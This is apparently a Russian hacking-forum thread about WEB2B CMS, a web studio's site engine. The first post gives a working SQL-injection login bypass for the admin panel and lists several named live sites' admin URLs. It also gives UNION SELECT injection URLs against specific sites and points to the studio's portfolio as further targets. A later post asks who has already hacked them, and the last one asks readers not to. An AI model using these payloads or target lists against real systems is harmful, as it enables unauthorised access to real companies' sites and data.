Вообщем так. http://web2b.ru - офф. сайт конторы, разрабатывающей сайты и авторы своего двига WEB2B CMS... Вообщем входим в админку практически всех сайтов этого двига: Code: /admin/ login:asd' or 1=1/* password: asdasd На некоторых правда в админке "сидит" .htacces =\ Но даже если так, то по-крайней мере на многих их сайтах есть sql-inj =\ Вот примеры "таких" сайтов: Code: http://www.rustransavto.ru/admin http://www.blockmarine.ru/admin http://www.sundesignlux.ru/admin http://www.kupi-cupe.ru/admin http://www.imid.ru/news/?lang=rus&id=-99'+union+select+1,2,3,4,5,6,7/* http://www.promastanok.ru/mod/catalog/detail.php?id=-99'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* Портфолио ака все сайты конторы: http://web2b.ru/works.htm
Code: Warning: main(/usr/local/apache/htdocs/config.php): failed to open stream: No such file or directory in /home/www/htdocs/admin/index.php on line 3 Warning: main(): Failed opening '/usr/local/apache/htdocs/config.php' for inclusion (include_path='') in /home/www/htdocs/admin/index.php on line 3 Fatal error: Cannot instantiate non-existent class: admininterface in /home/www/htdocs/admin/index.php on line 4 Кто уже похекал? А такие бабки ломят за свою ху*ню, извиняюсь... Вобщем-то это и на CMS не тянет... функциональность на нуле.
Ребят, зря выложили, БОЛЬШАЯ ПРОСЬБА "НЕ ЛОМАЙТЕ САЙТЫ" - серьезные компании ведь, реально не хорошо. =)
